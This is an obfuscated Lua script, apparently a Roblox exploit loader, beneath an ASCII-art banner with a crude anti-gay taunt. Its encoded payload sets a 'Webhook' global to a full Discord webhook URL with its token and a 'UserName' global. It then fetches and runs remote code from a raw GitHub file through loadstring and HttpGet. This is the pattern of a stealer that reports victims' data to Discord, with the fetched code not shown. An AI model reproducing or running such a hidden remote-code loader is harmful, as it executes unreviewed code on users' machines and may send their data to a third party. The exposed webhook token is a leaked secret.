--[[


██████████████████████████████████████████████████
█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░██░░░░░░░░█
█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀░░██░░▄▀▄▀░░█
█░░▄▀░░░░░░░░░░█░░▄▀░░░░░░▄▀░░█░░░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░█████████░░▄▀░░██░░▄▀░░███░░▄▀▄▀░░▄▀▄▀░░███
█░░▄▀░░█████████░░▄▀░░░░░░▄▀░░███░░░░▄▀▄▀▄▀░░░░███
█░░▄▀░░██░░░░░░█░░▄▀▄▀▄▀▄▀▄▀░░█████░░░░▄▀░░░░█████
█░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░███████░░▄▀░░███████
█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███████░░▄▀░░███████
█░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░███████░░▄▀░░███████
█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░███████░░▄▀░░███████
█░░░░░░░░░░░░░░█░░░░░░██░░░░░░███████░░░░░░███████
██████████████████████████████████████████████████
     ur like gays man if u looking here                
         

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==4) then v16=function(v22,v23,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==2) then v31=function()local v48=v2(v22,v28,v28);v28=v28 + 1 ;return v48;end;v32=nil;v32=function()local v49,v50=v2(v22,v28,v28 + 2 + 0 );v28=v28 + 2 ;return (v50 * (2166 -(1909 + 1))) + v49 ;end;v27=3;end if (v27==1) then v30=nil;v30=function(v40,v41,v42)if v42 then local v82=(v40/((1 + 1 + 0)^(v41-(1 -0))))%((2 + 0 + 0)^(((v42-(1 + 0)) -(v41-(30 -(17 + (1353 -(1064 + 277)))))) + (62 -(58 + (1438 -(865 + 570)))))) ;return v82-(v82%(1 + 0)) ;else local v83=0 -0 ;local v84;while true do if (v83==(1184 -(855 + 329))) then v84=(2 -0)^(v41-(1 + 0 + 0)) ;return (((v40%(v84 + v84))>=v84) and 1) or (60 -(31 + 29)) ;end end end end;v31=nil;v27=2;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (v27==0) then v28=1;v29=nil;v22=v5(v4(v22,5),"..",function(v43)if (v2(v43,2)==79) then v29=v1(v4(v43,1,1));return "";else local v85=v3(v1(v43,16));if v29 then local v90=v6(v85,v29);v29=nil;return v90;else return v85;end end end);v27=1;end if (v27==6) then v38=nil;v38=function()local v51=1131 -(322 + 809) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==1) then v54=nil;v55=nil;v51=2 -0 ;end if ((1 + 2)==v51) then v58=nil;while true do local v91=0 + 0 ;while true do if (v91~=(1484 -(1120 + 364))) then else local v107=0 -0 ;local v108;while true do if (v107~=0) then else v108=0 + 0 ;while true do if (v108~=(0 -0)) then else local v118=0 -0 ;while true do if (v118==(656 -(594 + 62))) then if (v52~=(1 + 0)) then else local v128=0 + 0 ;local v129;while true do if (0==v128) then v129=740 -(716 + 24) ;while true do if (v129==(0 -0)) then local v159=0 + 0 ;local v160;while true do if (v159==(1471 -(146 + 1325))) then v160=0 -0 ;while true do if (v160==(1747 -(1709 + 38))) then v57=v33();v58={};v160=1 + 0 ;end if (v160==(2 -1)) then v129=1;break;end end break;end end end if (v129==(1885 -(61 + 1822))) then v52=1 + 1 ;break;end if (v129~=1) then else local v161=1791 -(1046 + 745) ;while true do if ((0 -0)==v161) then for v178=2 -1 ,v57 do local v179=0;local v180;local v181;while true do if (v179~=(0 -0)) then else local v186=0 -0 ;while true do if (v186==(576 -(571 + 4))) then v179=1;break;end if (v186==0) then v180=v31();v181=nil;v186=933 -(269 + 663) ;end end end if (v179==(1 + 0)) then if (v180==(3 -2)) then v181=v31()~=(922 -(914 + 8)) ;elseif (v180==2) then v181=v34();elseif (v180~=(12 -9)) then else v181=v35();end v58[v178]=v181;break;end end end v56[6 -3 ]=v31();v161=1;end if (v161==(1 -0)) then v129=2 + 0 ;break;end end end end break;end end end if (v52==0) then local v130=0;while true do if (v130~=(641 -(582 + 59))) then else v53={};v54={};v130=3 -2 ;end if (v130==(565 -(391 + 172))) then v52=1996 -(1364 + 631) ;break;end if (v130~=(221 -(79 + 141))) then else v55={};v56={v53,v54,nil,v55};v130=1 + 1 ;end end end v118=1 + 0 ;end if ((1 -0)~=v118) then else v108=1586 -(659 + 926) ;break;end end end if ((1724 -(1271 + 452))==v108) then v91=3 -2 ;break;end end break;end end end if (v91~=(335 -(127 + 207))) then else if (v52==(1487 -(351 + 1134))) then local v113=0 -0 ;while true do if (v113~=(4 -3)) then else local v115=0;while true do if ((0 + 0)==v115) then for v126=1 + 0 ,v33() do v55[v126]=v33();end return v56;end end end if (v113~=(1420 -(997 + 423))) then else for v119=1,v33() do local v120=0 -0 ;local v121;local v122;local v123;while true do if (v120==(3 -2)) then v123=nil;while true do if (v121~=(3 -2)) then else while true do if (v122~=(0 -0)) then else v123=v31();if (v30(v123,1,1 + 0 )==0) then local v162=0;local v163;local v164;local v165;while true do if (v162==(1144 -(938 + 206))) then local v171=711 -(205 + 506) ;local v172;while true do if (v171==0) then v172=0;while true do if (v172==(256 -(144 + 112))) then local v193=846 -(503 + 343) ;while true do if (v193==(1394 -(1160 + 234))) then v163=v30(v123,1 + 1 ,430 -(374 + 53) );v164=v30(v123,11 -7 ,6);v193=260 -(98 + 161) ;end if (v193==(1723 -(63 + 1659))) then v172=1;break;end end end if (v172==1) then v162=1263 -(324 + 938) ;break;end end break;end end end if (v162==2) then local v173=0;while true do if ((0 -0)==v173) then if (v30(v164,1 + 0 ,1 + 0 )==(1 + 0)) then v165[2 + 0 ]=v58[v165[2 + 0 ]];end if (v30(v164,2,1 + 1 )==(1920 -(1025 + 894))) then v165[7 -4 ]=v58[v165[13 -10 ]];end v173=1 -0 ;end if (v173==(1058 -(998 + 59))) then v162=1 + 2 ;break;end end end if (v162==(569 -(135 + 431))) then if (v30(v164,4 -1 ,3)==(2 -1)) then v165[4]=v58[v165[14 -10 ]];end v53[v119]=v165;break;end if (v162==1) then local v175=0;while true do if (v175~=(1975 -(1192 + 782))) then else v162=2;break;end if (v175~=0) then else v165={v32(),v32(),nil,nil};if (v163==(0 -0)) then local v192=0 -0 ;while true do if (v192==(0 + 0)) then v165[10 -7 ]=v32();v165[12 -8 ]=v32();break;end end elseif (v163==(1473 -(1257 + 215))) then v165[7 -4 ]=v33();elseif (v163==(4 -2)) then v165[1043 -(843 + 197) ]=v33() -((2 -0)^(32 -16)) ;elseif (v163==(1 + 2)) then local v198=0 -0 ;local v199;while true do if (v198~=(0 -0)) then else v199=0;while true do if (v199~=0) then else v165[335 -(133 + 199) ]=v33() -((7 -5)^(51 -35)) ;v165[708 -(279 + 425) ]=v32();break;end end break;end end end v175=3 -2 ;end end end end end break;end end break;end if (v121~=(0 + 0)) then else v122=1585 -(463 + 1122) ;v123=nil;v121=2 -1 ;end end break;end if (v120==0) then v121=0 -0 ;v122=nil;v120=3 -2 ;end end end for v124=1,v33() do v54[v124-(1 -0) ]=v38();end v113=1 + 0 ;end end end break;end end end break;end if (v51==(75 -(26 + 49))) then local v86=686 -(188 + 498) ;local v87;while true do if (v86~=(615 -(525 + 90))) then else v87=0;while true do if (v87~=(0 -0)) then else local v114=0;while true do if (v114~=(353 -(120 + 233))) then else v52=0 -0 ;v53=nil;v114=1 -0 ;end if (v114==1) then v87=1 + 0 ;break;end end end if (v87==(1619 -(400 + 1218))) then v51=1 -0 ;break;end end break;end end end if (v51~=(8 -6)) then else local v88=0;local v89;while true do if (v88~=(0 -0)) then else v89=0 -0 ;while true do if (v89~=(1 + 0)) then else v51=5 -2 ;break;end if ((0 -0)~=v89) then else v56=nil;v57=nil;v89=1 + 0 ;end end break;end end end end end;v39=nil;v27=7;end if (v27==7) then v39=function(v44,v45,v46)local v59=v44[1];local v60=v44[2];local v61=v44[3];return function(...)local v74=0;local v75;local v76;local v77;local v78;local v79;while true do if (v74==0) then v75=1;v76= -1;v74=1;end if (v74==1) then v77={...};v78=v13("#",...) -1 ;v74=2;end if (2==v74) then v79=nil;v79=function()local v92=v59;local v93=v60;local v94=v61;local v95=v37;local v96={};local v97={};local v98={};for v102=0 + 0 ,v78 do if ((((28072 -19675) -5250)<(967 + 2740)) and (v102>=v94)) then v96[v102-v94 ]=v77[v102 + (1321 -((1210 -(23 + 523)) + 656)) ];else v98[v102]=v77[v102 + 1 ];end end local v99=(v78-v94) + (3 -2) ;local v100;local v101;while true do local v103=0 -(0 -0) ;local v104;while true do if (((8333 -4222)>=((25662 -20136) -3525)) and (v103==(0 -0))) then v104=0;while true do if (((696 -(410 + 236))<3704) and (v104==(1 + 0))) then if ((v101<=4) or ((1308 -((17 -4) + 13 + 14))>=(3177 -1741))) then if (((4238 -((2321 -1831) + 390))>=((3168 -(1657 + 38)) -(14 + 1252))) and (v101<=(1 + 0))) then if (((6311 -(1008 + 751))>(2386 -(236 + 286))) and (v101==((0 -0) -0))) then local v131=0;local v132;local v133;while true do if ((v131==(1 + 0)) or ((13141 -9490)>=(4018 + 384))) then v98[v132 + 1 ]=v133;v98[v132]=v133[v100[3 + 1 ]];break;end if ((v131==(1100 -(822 + 278))) or ((47 + 2262)<1740)) then v132=v100[2];v133=v98[v100[8 -5 ]];v131=1;end end else v98[v100[2 -0 ]]=v100[1567 -(1138 + 426) ];end elseif (((4439 + 293)>(4698 -(83 + 808))) and (v101<=(3 -1))) then v98[v100[2]]=v46[v100[3]];elseif ((v101>(11 -(11 -3))) or ((14981 -11068)>=((381 -238) + (16919 -12548)))) then local v141=308 -(162 + 146) ;local v142;local v143;local v144;while true do if (((783 -(12 + 22))<(4047 -1906)) and (v141==(0 + 0))) then v142=0;v143=nil;v141=(1 -0) + 0 + 0 ;end if ((v141==(1 + 0)) or ((1359 + 2816)<762)) then v144=nil;while true do if ((1884<=(5288 -(356 + 690))) and (v142==0)) then local v168=0 + 0 ;while true do if ((v168==1) or (1983<(646 + 1030))) then v142=1302 -(1178 + 123) ;break;end if (((4967 -1748)>=(512 + 2188)) and (v168==(0 + 0))) then v143=1238 -(359 + 35 + 844) ;v144=nil;v168=2 -1 ;end end end if ((v142==(1 + 0)) or (901>=(5826 -(3359 -(906 + 580))))) then while true do if ((v143==0) or (((3752 -1751) -(1051 + 608))>(4677 -2386))) then v144=v100[1911 -(1383 + 526) ];v98[v144]=v98[v144](v14(v98,v144 + (2 -1) ,v76));break;end end break;end end break;end end else v46[v100[1 + 2 ]]=v98[v100[1 + 1 ]];end elseif ((v101<=(1748 -(1579 + (457 -294)))) or ((4459 + 130)<(5350 -3087))) then if ((v101==(1169 -(622 + 542))) or ((8754 -(16067 -9704))>=4185)) then if (((783 + 2039)<(5153 -(370 + 1019))) and (v98[v100[1 + 1 ]]==v100[1 + 3 ])) then v75=v75 + ((1 -0) -(0 + 0)) ;else v75=v100[673 -(310 + 360) ];end else v75=v100[152 -(81 + 68) ];end elseif ((v101<=(15 -8)) or (3578<=((1306 + 3234) -(1147 + 375)))) then do return;end elseif ((v101>(2 + (13 -7))) or ((2501 -(229 + 1144))<=723)) then local v148=977 -(771 + 206) ;local v149;local v150;local v151;local v152;while true do if ((2619>=1691) and ((4 -(4 -2))==v148)) then for v166=v149,v76 do local v167=0 -0 ;while true do if (((2684 -(1495 + 73))<=(5158 -(1176 + 532))) and (v167==(1549 -(348 + 1201)))) then v152=v152 + (462 -((1316 -(14 + 1038)) + 197)) ;v98[v166]=v150[v152];break;end end end break;end if (((1408 -911)<=(3614 -(175 + 343))) and (v148==(1828 -(133 + 1694)))) then v76=(v151 + v149) -(2 -1) ;v152=0 -0 ;v148=(325 + 216) -(347 + 165 + 27) ;end if ((v148==(1462 -(1032 + 430))) or ((7493 -4220)>4258)) then local v158=0 -0 ;while true do if ((v158==(4 -3)) or ((1919 + 1758)<=(3499 -(165 + 13)))) then v148=459 -(28 + 430) ;break;end if ((((7881 -4905) -((2035 -(513 + 84)) + 513))<=(9110 -6306)) and (v158==(0 -0))) then v149=v100[162 -(69 + 91) ];v150,v151=v95(v98[v149](v14(v98,v149 + (1 -0) ,v100[3])));v158=432 -(35 + (641 -(145 + 100))) ;end end end end else v98[v100[(6 -4) + 0 ]]();end v75=v75 + (184 -(180 + 3)) ;break;end if (((3789 -((2148 -(849 + 836)) + 49))<(5335 -(714 + 11 + 60))) and (v104==(585 -(409 + 176)))) then local v116=0 -0 ;local v117;while true do if (((0 + 0)==v116) or ((3099 -2056)>(2174 + 334))) then v117=1566 -(1430 + 136) ;while true do if ((v117==(840 -(665 + 174))) or ((10704 -7251)<=(1650 -727))) then v104=1 + 0 + 0 ;break;end if (((11166 -7327)>(2145 -(97 + 58))) and (v117==0)) then v100=v92[v75];v101=v100[1 + 0 ];v117=1227 -(440 + 786) ;end end break;end end end end break;end end end end;v74=3;end if (3==v74) then A,B=v37(v12(v79));if  not A[1] then local v105=0;local v106;while true do if (0==v105) then v106=v44[4][v75] or "?" ;error("Script error at ["   .. v106   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end break;end end end;end;return v39(v38(),{},v23)(...);end if (v27==3) then v33=nil;v33=function()local v62,v63,v64,v65=v2(v22,v28,v28 + (8 -5) );v28=v28 + (8 -4) ;return (v65 * 16777216) + (v64 * (7151 + 58385)) + (v63 * 256) + v62 ;end;v34=nil;v27=4;end if (v27==4) then v34=function()local v66=v33();local v67=v33();local v68=1867 -(774 + 1092) ;local v69=(v30(v67,1 + 0 + 0 ,20) * ((2 + 0)^(96 -64))) + v66 ;local v70=v30(v67,6 + 15 ,16 + 15 );local v71=((v30(v67,32)==(2 -1)) and  -(3 -2)) or ((434 -(315 + 118)) + 0) ;if (v70==(0 + 0)) then if (v69==(1961 -(1396 + 565))) then return v71 * (0 -0) ;else v70=1;v68=681 -(142 + 331 + 208) ;end elseif (v70==(190 + 1857)) then return ((v69==(0 -0)) and (v71 * (1/((1689 + 72) -(1516 + 245))))) or (v71 * NaN) ;end return v9(v71,v70-(1444 -421) ) * (v68 + (v69/((875 -(521 + 352))^(93 -41)))) ;end;v35=nil;v35=function(v47)local v72;if  not v47 then v47=v33();if (v47==(1413 -(20 + 1393))) then return "";end end v72=v4(v22,v28,(v28 + v47) -(1109 -(501 + 607)) );v28=v28 + v47 ;local v73={};for v80=2 -1 , #v72 do v73[v80]=v3(v2(v4(v72,v80,v80)));end return v7(v73);end;v27=5;end end end;v16("LOL!0A3O00028O0003083O00557365724E616D65030B3O0042617365596F757475626503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303830313436383O3335373135363530322F6C4F325F58454B795774774B7071415A4666615456514776515A4D475F50646F394A384C64346C597365535464533467434834396F4E316B776670305263432D54777465026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F72692O7A6875622F6D61696E2F4E65772E6C756100143O0012013O00013O0026053O0008000100010004063O00080001001201000100033O001203000100023O001201000100053O001203000100043O0012013O00063O0026053O0001000100060004063O00010001001202000100073O001202000200083O00202O0002000200090012010004000A4O0009000200044O000400013O00022O00080001000100010004063O001300010004063O000100012O00073O00017O00143O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end end end
